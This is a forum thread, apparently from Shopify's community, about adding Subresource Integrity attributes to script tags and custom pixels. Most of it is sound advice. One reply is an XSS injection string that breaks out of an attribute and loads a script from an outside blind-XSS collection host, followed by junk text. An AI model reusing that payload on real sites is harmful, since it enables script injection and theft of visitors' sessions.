Script Src Integrity Check

haninajieha · March 26, 2025, 3:05am

How can I modify your script tags to include SRI attributes for security.

user1725 · October 13, 2025, 3:58pm

'"><script src=https://xss.report/c/losec1></script>     



fifhybsdfef
sfdifsb
sesgjjbgs]

BartZ · October 14, 2025, 7:36am

{{ ‘file.js’ | script_tag }} doesn’t support extra attributes, so write a plain tag:

<script
  src="{{ 'app.js' | asset_url }}"
  integrity="sha384-PASTE_BASE64_HASH_HERE"
  crossorigin="anonymous">
</script>

For third-party URLs:

<script
  src="https://aggle.net/js?publisher=herb.co&pid=CB6UX9E2&sruid=d4275a37440610de"
  integrity="sha384-PASTE_BASE64_HASH_HERE"
  crossorigin="anonymous">
</script>

Also you can add integrity in custom pixels.

BartZ · October 14, 2025, 7:38am

In custom pixel:

analytics.subscribe('page_viewed', () => {
  const s = document.createElement('script');
  s.src = 'https://someurl.com/some.js';
  s.async = true;
  s.integrity = 'sha384-PASTE_BASE64_HASH_HERE';
  s.crossOrigin = 'anonymous';
  document.head.appendChild(s);
});

Topic		Replies	Views
Has anyone found a way to add integrity tags to system loaded script files? Technical Q&A	0	18	May 31, 2021
Defer filter for the script_tag? Store Design	3	414	August 29, 2023
How not to add the "shop" parameter to src when creating a ScriptTag? Custom Storefronts	3	60	February 21, 2020
Can attributes be controlled for script tags from the script_tags API? Shopify Apps	0	22	November 17, 2021
Script tag adding issue Authentication	1	30	October 8, 2021

Script Src Integrity Check

Related topics